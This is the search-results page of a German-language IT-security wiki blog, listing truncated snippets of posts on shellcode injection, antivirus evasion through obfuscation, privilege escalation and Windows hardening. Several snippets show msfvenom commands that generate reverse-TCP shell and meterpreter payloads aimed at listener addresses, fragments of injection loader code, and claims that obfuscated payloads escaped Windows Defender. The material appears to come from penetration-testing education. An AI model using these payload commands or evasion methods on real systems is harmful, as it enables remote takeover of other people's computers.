Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- Obfuscation: polymorpher In-Memory Decoder @it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: polymorpher In-Memor... ilieren. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... ährend meines Tests wurde selbst das Metasploit Payload nicht vom Windows Defender erkannt. ~~DISCUSSION~~
- Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: Shellcode als UUIDs ... ode, die ich hierbei zum Testen nutzte, wurde vom Windows Defender sofort blockiert. Somit musste ich Loade... bzw. Enkodierung. Dieses wird in der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Shellcode Injection Teil 1 @it-security:blog
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 1 ====== {{:it-secur... e in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... Shellcode im Raw Format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Shellcode Injection Teil 2 @it-security:blog
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 2 ====== {{:it-secur... n. Diese Form der Injection wird in der Regel vom Windows Defender erkannt, so dass wir wieder einige Obfus... e Ausgabe erfolgt binär: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ithub.com/fritzone/obfy )) war direkt ein Erfolg. Windows Defender konnte die kompilierte Datei nicht mehr
- Shellcode Injection Teil 4 @it-security:blog
- {{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 4 ====== {{:it-secur... füllt sein: * Start von ''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-By... Adresse ==== Mit jedem Start eines Prozesses in Windows, werden Module in diesen Prozess geladen. Eines d... ''kernel32.dll''. Im Arbeitsspeicher werden durch Windows Datenstrukturen angelegt, welche alle für uns nöt
- 64-Bit Stack CheatSheet
- olgt aufgebaut((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
- Shellcode Injection Teil 3 @it-security:blog
- {{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 3 ====== {{:it-secur... ile 143 / +7 markiert den Anfang des Dateinamens (WindowsAgent.py) lea edx, [esi + 7] ;Zeile 184 / Befehlszeile, die ausgeführt werden soll db "python WindowsAgent.py", 0 ;Zeile 192 / Unsere URL db "http://... stellen === Den Shellcode müssen wir als ''%%x86 Windows%%'' Binärdatei ausgeben. Dies machen wir mit ''%%
- IT Security Cheat Sheets
- ecurity bypass bins | [[ghio>gtfobins]] | ^ ::: | Windows security bypass bins | [[ghio>lolbas-project]] | ... ed | [[gh>aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executabl
- FatCat Attack PoC @it-security:blog
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... d generieren <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
- {{tag>it-security windows linux blog deutsch}} ====== Privilegien-Eskalation: Windows-Admin dank Linux ====== In diesem Tutorial zeige ich euch, wie man sich Administrator-Rechte an Windows PCs mittels Live-Boot CD sichern kann. Wir werden... og:screenshot_2024-03-14_144552.png|}} Auf einem Windows System sind die Benutzer ''User'' und ''sysadmin'
- Die Bedeutung von Awareness in der IT-Sicherheit @it-security:blog
- elche als Anhang in einer E-Mail geschickt wurde. Windows hat diese eingebunden und die Schadsoftware konnt
- Group Managed Service Accounts
- {{tag>deutsch startpage it-security windows active-directory}} ====== Group Managed Service Accounts ======... t werden. Aussage von Microsoft hierzu: > Ab dem Windows 10-Update vom Oktober 2018 ist RSAT als Sammlung von Features bei Bedarf in Windows 10 selbst enthalten. Anstatt ein RSAT-Paket herun... uzeigen. <sup>[[https://learn.microsoft.com/de-de/windows-server/remote/remote-server-administration-tools]
- Sichere Passwörter
- in anderes Passwort benutzen * Die Grundlagen [[windows:security_basics|Windows Sicherheitstipps]] beachten * Passwörter niemals weitergeben ===== 6.0 Multifak
- SMB Hardening
- {{tag>deutsch startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technisch... wie folgt abgefragt werden: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... Neustart erforderlich): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... u finden: <code> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen